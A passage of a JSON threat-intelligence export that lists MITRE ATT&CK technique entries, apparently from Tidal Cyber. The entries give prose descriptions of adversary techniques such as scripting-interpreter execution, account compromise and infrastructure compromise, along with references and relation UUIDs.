"description": "Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the <code>python.exe</code> interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.\n\nPython comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1059.006"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
}
],
"uuid": "68fed1c9-e060-4c4d-83d9-d8c817893d65",
"value": "Python"
},
{
"description": "Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.<sup>[[DieNet Bash](https://app.tidalcyber.com/references/c5b362ce-6bae-46f7-b047-e3a0b2bf2580)]</sup><sup>[[Apple ZShell](https://app.tidalcyber.com/references/5374ad8e-96a2-4d19-b2cf-28232fa97b52)]</sup> Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.\n\nUnix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.\n\nAdversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with [SSH](https://app.tidalcyber.com/technique/7620ba3a-7877-4f87-90e3-588163ac0474). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1059.004"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
}
],
"uuid": "3eafcd8b-0cb8-4d23-8785-3f80a3c897c7",
"value": "Unix Shell"
},
{
"description": "Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66) and the [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.<sup>[[VB .NET Mar 2020](https://app.tidalcyber.com/references/da6d1b56-8e59-4125-b318-48a40a1c8e94)]</sup><sup>[[VB Microsoft](https://app.tidalcyber.com/references/b23a1a5d-48dd-4346-bf8d-390624214081)]</sup>\n\nDerivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.<sup>[[Microsoft VBA](https://app.tidalcyber.com/references/ba0e3c5d-7934-4ece-b4a1-c03bc355f378)]</sup><sup>[[Wikipedia VBA](https://app.tidalcyber.com/references/70818420-c3ec-46c3-9e97-d8f989f2e3db)]</sup> VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://app.tidalcyber.com/technique/8a669da8-8894-4fb0-9124-c3c8418985cc) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).<sup>[[Microsoft VBScript](https://app.tidalcyber.com/references/5ea8d8c7-8039-4210-967a-a4dcd566bf95)]</sup>\n\nAdversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://app.tidalcyber.com/technique/ba553ad4-5699-4458-ae4e-76e1faa43291) payloads (which may also involve [Mark-of-the-Web Bypass](https://app.tidalcyber.com/technique/7ee64e42-6d3b-47f8-a2a9-55263537bd51) to enable execution).<sup>[[Default VBS macros Blocking ](https://app.tidalcyber.com/references/d86883dd-3766-4971-91c7-b205ed13cc37)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1059.005"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
}
],
"uuid": "0340ed34-6db2-4979-bf73-2c16855867b4",
"value": "Visual Basic"
},
{
"description": "Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) such as [SSH](https://app.tidalcyber.com/technique/7620ba3a-7877-4f87-90e3-588163ac0474).<sup>[[SSH in Windows](https://app.tidalcyber.com/references/3006af23-b802-400f-841d-7eea7d748d28)]</sup>\n\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.\n\nAdversaries may leverage [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) to execute various commands and payloads. Common uses include [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) to execute a single command, or abusing [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) interactively with input and output forwarded over a command and control channel.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1059.003"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
}
],
"uuid": "be095bcc-4769-4010-b2db-3033d01efdbe",
"value": "Windows Command Shell"
},
{
"description": "Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://app.tidalcyber.com/technique/3eafcd8b-0cb8-4d23-8785-3f80a3c897c7) while Windows installations include the [Windows Command Shell](https://app.tidalcyber.com/technique/be095bcc-4769-4010-b2db-3033d01efdbe) and [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde).\n\nThere are also cross-platform interpreters such as [Python](https://app.tidalcyber.com/technique/68fed1c9-e060-4c4d-83d9-d8c817893d65), as well as those commonly associated with client applications such as [JavaScript](https://app.tidalcyber.com/technique/8a669da8-8894-4fb0-9124-c3c8418985cc) and [Visual Basic](https://app.tidalcyber.com/technique/0340ed34-6db2-4979-bf73-2c16855867b4).\n\nAdversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://app.tidalcyber.com/tactics/586a5b49-c566-4a57-beb4-e7c667f9c34c) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) in order to achieve remote Execution.<sup>[[Powershell Remote Commands](https://app.tidalcyber.com/references/24c526e1-7199-45ca-99b4-75e75c7041cd)]</sup><sup>[[Cisco IOS Software Integrity Assurance - Command History](https://app.tidalcyber.com/references/dbca06dd-1184-4d52-9ee8-b059e368033c)]</sup><sup>[[Remote Shell Execution in Python](https://app.tidalcyber.com/references/4ea54256-42f9-4b35-8f9e-e595ab9be9ce)]</sup>",
"meta": {
"platforms": [
"Azure AD",
"Google Workspace",
"IaaS",
"Linux",
"macOS",
"Network",
"Office 365",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
},
{
"dest-uuid": "9f06ef9b-d587-41d3-8fc8-7d539dac5701",
"type": "similar"
},
{
"dest-uuid": "af798e80-2cc5-5452-83e4-9560f08bf2d5",
"type": "similar"
},
{
"dest-uuid": "8a669da8-8894-4fb0-9124-c3c8418985cc",
"type": "similar"
},
{
"dest-uuid": "284bfbb3-99f0-4c3d-bc1f-ab74065b7907",
"type": "similar"
},
{
"dest-uuid": "6ca7838a-e8ad-43e8-9da6-15b640d1cbde",
"type": "similar"
},
{
"dest-uuid": "68fed1c9-e060-4c4d-83d9-d8c817893d65",
"type": "similar"
},
{
"dest-uuid": "3eafcd8b-0cb8-4d23-8785-3f80a3c897c7",
"type": "similar"
},
{
"dest-uuid": "0340ed34-6db2-4979-bf73-2c16855867b4",
"type": "similar"
},
{
"dest-uuid": "be095bcc-4769-4010-b2db-3033d01efdbe",
"type": "similar"
}
],
"uuid": "a2184d53-63b1-4c40-81ed-da799080c36c",
"value": "Command and Scripting Interpreter"
},
{
"description": "Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system. Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by [Replication Through Removable Media](https://app.tidalcyber.com/technique/6a7ab25e-49ed-4cd3-b199-5d80b728b416). Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
"type": "uses"
}
],
"uuid": "0783c499-1564-4062-addc-f1ff86ef4e59",
"value": "Communication Through Removable Media"
},
{
"description": "Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://app.tidalcyber.com/technique/ce886c55-17ab-4c1c-90dc-3aa93e69bdb4) or to [Upload Tool](https://app.tidalcyber.com/technique/d7594eaf-286f-4484-94fa-8608c911767a)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://app.tidalcyber.com/technique/2c04d7c8-67a3-4b1a-bd71-47b7c5a54b23)s or [Serverless](https://app.tidalcyber.com/technique/c30faf84-496b-4f27-a4bc-aa36d583c69f) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.<sup>[[Awake Security C2 Cloud](https://app.tidalcyber.com/references/fa3762ce-3e60-4991-b464-12601d2a6912)]</sup>\n\nA variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06), purchasing credentials from third-party sites, conducting [Password Spraying](https://app.tidalcyber.com/technique/e63414a7-c6f7-4bcf-a6eb-25b0c4ddbb2a) attacks, or attempting to [Steal Application Access Token](https://app.tidalcyber.com/technique/f78f2c87-626a-468f-93a5-31b61be17727)s.<sup>[[MSTIC Nobelium Oct 2021](https://app.tidalcyber.com/references/7b6cc308-9871-47e5-9039-a9a7e66ce373)]</sup> Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf) between service providers and their customers.<sup>[[MSTIC Nobelium Oct 2021](https://app.tidalcyber.com/references/7b6cc308-9871-47e5-9039-a9a7e66ce373)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1586.003"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
}
],
"uuid": "4b187604-88ab-4972-9836-90a04c705e10",
"value": "Cloud Accounts - Duplicate2"
},
{
"description": "Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06), [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533), or large-scale spam email campaigns. Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship with, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://app.tidalcyber.com/technique/b9f5f6b7-ecff-48c8-a23e-c58fd9e41a0d)).\n\nA variety of methods exist for compromising email accounts, such as gathering credentials via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06), purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials.<sup>[[AnonHBGary](https://app.tidalcyber.com/references/19ab02ea-883f-441c-bebf-4be64855374a)]</sup><sup>[[Microsoft DEV-0537](https://app.tidalcyber.com/references/2f7a59f3-620d-4e2e-8595-af96cd4e16c3)]</sup> Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. Adversaries may target compromising well-known email accounts or domains from which malicious spam or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) emails may evade reputation-based email filtering rules.\n\nAdversaries can use a compromised email account to hijack existing email threads with targets of interest.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1586.002"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
}
],
"uuid": "49ae7bf1-a313-41d6-ad4c-74efc4c80ab6",
"value": "Email Accounts - Duplicate"
},
{
"description": "Adversaries may compromise social media accounts that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating social media profiles (i.e. [Social Media Accounts](https://app.tidalcyber.com/technique/fe0bf22c-efb2-4bc6-96d8-e0e909502fd7)), adversaries may compromise existing social media accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. \n\nA variety of methods exist for compromising social media accounts, such as gathering credentials via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).<sup>[[AnonHBGary](https://app.tidalcyber.com/references/19ab02ea-883f-441c-bebf-4be64855374a)]</sup> Prior to compromising social media accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.\n\nPersonas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Compromised social media accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.\n\nAdversaries can use a compromised social media profile to create new, or hijack existing, connections to targets of interest. These connections may be direct or may include trying to connect through others.<sup>[[NEWSCASTER2014](https://app.tidalcyber.com/references/9abb4bbb-bad3-4d22-b235-c8a35465f2ce)]</sup><sup>[[BlackHatRobinSage](https://app.tidalcyber.com/references/82068e93-a3f8-4d05-9358-6fe76a0055bb)]</sup> Compromised profiles may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://app.tidalcyber.com/technique/165ba336-3eab-4809-b6fd-d0dcc5478f7f)).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1586.001"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
}
],
"uuid": "3426077d-3b9c-4f77-a1c6-d68f0dea670e",
"value": "Social Media Accounts - Duplicate"
},
{
"description": "Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4)), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. \n\nA variety of methods exist for compromising accounts, such as gathering credentials via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06), purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials.<sup>[[AnonHBGary](https://app.tidalcyber.com/references/19ab02ea-883f-441c-bebf-4be64855374a)]</sup><sup>[[Microsoft DEV-0537](https://app.tidalcyber.com/references/2f7a59f3-620d-4e2e-8595-af96cd4e16c3)]</sup> Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.\n\nPersonas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.\n\nAdversaries may directly leverage compromised email accounts for [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533).",
"meta": {
"platforms": [
"PRE"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
},
{
"dest-uuid": "4b187604-88ab-4972-9836-90a04c705e10",
"type": "similar"
},
{
"dest-uuid": "49ae7bf1-a313-41d6-ad4c-74efc4c80ab6",
"type": "similar"
},
{
"dest-uuid": "3426077d-3b9c-4f77-a1c6-d68f0dea670e",
"type": "similar"
}
],
"uuid": "c6374cbe-799a-4648-b1e2-2a66bb42d3f3",
"value": "Compromise Accounts"
},
{
"description": "Adversaries may modify client software binaries to establish persistent access to systems. Client software enables users to access services provided by a server. Common client software types are SSH clients, FTP clients, email clients, and web browsers.\n\nAdversaries may make modifications to client software binaries to carry out malicious tasks when those applications are in use. For example, an adversary may copy source code for the client software, add a backdoor, compile for the target, and replace the legitimate application binary (or support files) with the backdoored one. An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)<sup>[[Unit42 Banking Trojans Hooking 2022](https://app.tidalcyber.com/references/411c3df4-08e6-518a-953d-19988b663dc4)]</sup> prior to the binarys legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.<sup>[[ESET FontOnLake Analysis 2021](https://app.tidalcyber.com/references/dbcced87-91ee-514f-98c8-29a85d967384)]</sup>\n\nSince these applications may be routinely executed by the user, the adversary can leverage this for persistent access to the host.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
}
],
"uuid": "05435e33-05fe-4a41-b8e4-694d45eb9147",
"value": "Compromise Client Software Binary"
},
{
"description": "Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.<sup>[[Norton Botnet](https://app.tidalcyber.com/references/f97427f1-ea16-4e92-a4a2-4d62a800df15)]</sup> Instead of purchasing/renting a botnet from a booter/stresser service, adversaries may build their own botnet by compromising numerous third-party systems.<sup>[[Imperva DDoS for Hire](https://app.tidalcyber.com/references/86f87ec6-058e-45a7-9314-0579a2b4e8f2)]</sup> Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers.<sup>[[Dell Dridex Oct 2015](https://app.tidalcyber.com/references/f81ce947-d875-4631-9709-b54c8b5d25bc)]</sup> With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) or Distributed Denial of Service (DDoS).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1584.005"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
}
],
"uuid": "66caa162-711c-44ac-b96d-0552cf328f84",
"value": "Botnet"
},
{
"description": "Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://app.tidalcyber.com/technique/8a7afe43-b814-41b3-8bd8-e1301b8ba5b4)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.\n\nBy compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.<sup>[[Talos DNSpionage Nov 2018](https://app.tidalcyber.com/references/d597ad7d-f808-4289-b42a-79807248c2d6)]</sup><sup>[[FireEye DNS Hijack 2019](https://app.tidalcyber.com/references/2c696e90-11eb-4196-9946-b5c4c11ccddc)]</sup> Additionally, adversaries may leverage such control in conjunction with [Digital Certificates](https://app.tidalcyber.com/technique/4c0db4e5-14e0-4fb7-88b0-bb391ce5ad58) to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.<sup>[[FireEye DNS Hijack 2019](https://app.tidalcyber.com/references/2c696e90-11eb-4196-9946-b5c4c11ccddc)]</sup><sup>[[Crowdstrike DNS Hijack 2019](https://app.tidalcyber.com/references/969ad6de-9415-464d-ba52-2e61e1814a92)]</sup> Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.<sup>[[CiscoAngler](https://app.tidalcyber.com/references/0b10d7d4-9c18-4fd8-933a-b46e41d618ab)]</sup><sup>[[Proofpoint Domain Shadowing](https://app.tidalcyber.com/references/4653a9a5-95f1-4b02-9bf0-8f1b8cd6c059)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1584.002"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
}
],
"uuid": "83e4f633-67fb-4d87-b1b3-8a7a2e60778b",
"value": "DNS Server - Duplicate"
},
{
"description": "Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.<sup>[[ICANNDomainNameHijacking](https://app.tidalcyber.com/references/96c5ec6c-d53d-49c3-bca1-0b6abe0080e6)]</sup> Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.<sup>[[Krebs DNS Hijack 2019](https://app.tidalcyber.com/references/9bdc618d-ff55-4ac8-8967-6039c6c24cb1)]</sup>\n\nSubdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.<sup>[[Microsoft Sub Takeover 2020](https://app.tidalcyber.com/references/b8005a55-7e77-4dc1-abed-f75a0a3d8afb)]</sup>\n\nAdversaries who compromise a domain may also engage in domain shadowing by creating malicious subdomains under their control while keeping any existing DNS records. As service will not be disrupted, the malicious subdomains may go unnoticed for long periods of time.<sup>[[Palo Alto Unit 42 Domain Shadowing 2022](https://app.tidalcyber.com/references/ec460017-fd25-5975-b697-c8c11fee960d)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1584.001"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
}
],
"uuid": "581722ea-81a5-4c73-a703-2c994f1cf814",
"value": "Domains"
},
{
"description": "Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://app.tidalcyber.com/technique/6e4a0960-dcdc-4e42-9aa1-70d6fc3677b2) or [Virtual Private Server](https://app.tidalcyber.com/technique/2c04d7c8-67a3-4b1a-bd71-47b7c5a54b23), adversaries may compromise third-party servers in support of operations.\n\nAdversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381), or email servers to support [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) operations.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1584.004"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
}
],
"uuid": "ce71e252-3403-4287-a0b5-9328fa88af96",
"value": "Server"
},
{
"description": "Adversaries may compromise serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them. \n\nOnce compromised, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://app.tidalcyber.com/technique/ba6a869a-c870-4be6-bc08-e078f0efdc3b) traffic to an adversary-owned command and control server.<sup>[[BlackWater Malware Cloudflare Workers](https://app.tidalcyber.com/references/053895e8-da3f-4291-a728-2198fde774e7)]</sup><sup>[[AWS Lambda Redirector](https://app.tidalcyber.com/references/9ba87a5d-a140-4959-9905-c4a80e684d56)]</sup> As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.<sup>[[Detecting Command & Control in the Cloud](https://app.tidalcyber.com/references/b12e0288-48cd-46ec-8305-0f4d050782f2)]</sup><sup>[[BlackWater Malware Cloudflare Workers](https://app.tidalcyber.com/references/053895e8-da3f-4291-a728-2198fde774e7)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1584.007"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
}
],
"uuid": "f2b5a3e4-8a59-41f5-88c4-142f2da251c8",
"value": "Serverless"
},
{
"description": "Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.<sup>[[NSA NCSC Turla OilRig](https://app.tidalcyber.com/references/3e86a807-5188-4278-9a58-babd23b86410)]</sup>\n\nCompromising a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers as well as that added by the compromised third-party.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1584.003"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
}
],
"uuid": "3bd8c928-a7c8-4376-8f2f-2e0fcb449b37",
"value": "Virtual Private Server"
},
{
"description": "Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, SendGrid, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://app.tidalcyber.com/technique/a729feee-8e21-444e-8eea-2ec595b09931)), [Exfiltration Over Web Service](https://app.tidalcyber.com/technique/66768217-acdd-4b52-902f-e29483630ad6), or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533).<sup>[[Recorded Future Turla Infra 2020](https://app.tidalcyber.com/references/73aaff33-5a0e-40b7-a089-77ac57da8dca)]</sup> Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them. Additionally, leveraging compromised web-based email services may allow adversaries to leverage the trust associated with legitimate domains.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1584.006"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
}
],
"uuid": "ef312a77-6b1a-4be6-a220-3c689e7fcd9d",
"value": "Web Services"
},
{
"description": "Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.<sup>[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]</sup><sup>[[ICANNDomainNameHijacking](https://app.tidalcyber.com/references/96c5ec6c-d53d-49c3-bca1-0b6abe0080e6)]</sup><sup>[[Talos DNSpionage Nov 2018](https://app.tidalcyber.com/references/d597ad7d-f808-4289-b42a-79807248c2d6)]</sup><sup>[[FireEye EPS Awakens Part 2](https://app.tidalcyber.com/references/7fd58ef5-a0b7-40b6-8771-ca5e87740965)]</sup> Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.\n\nUse of compromised infrastructure allows adversaries to stage, launch, and execute operations. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with [Digital Certificates](https://app.tidalcyber.com/technique/4c0db4e5-14e0-4fb7-88b0-bb391ce5ad58)) to further blend in and support staged information gathering and/or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) campaigns.<sup>[[FireEye DNS Hijack 2019](https://app.tidalcyber.com/references/2c696e90-11eb-4196-9946-b5c4c11ccddc)]</sup> Additionally, adversaries may also compromise infrastructure to support [Proxy](https://app.tidalcyber.com/technique/ba6a869a-c870-4be6-bc08-e078f0efdc3b) and/or proxyware services.<sup>[[amnesty_nso_pegasus](https://app.tidalcyber.com/references/9e40d93a-fe91-504a-a6f2-e6546067ba53)]</sup><sup>[[Sysdig Proxyjacking](https://app.tidalcyber.com/references/26562be2-cab6-5867-9a43-d8a59c663596)]</sup>\n\nBy using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.<sup>[[NSA NCSC Turla OilRig](https://app.tidalcyber.com/references/3e86a807-5188-4278-9a58-babd23b86410)]</sup>",
"meta": {
"platforms": [
"PRE"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
"type": "uses"
},
{
"dest-uuid": "66caa162-711c-44ac-b96d-0552cf328f84",
"type": "similar"
},
{
"dest-uuid": "83e4f633-67fb-4d87-b1b3-8a7a2e60778b",
"type": "similar"
},
{
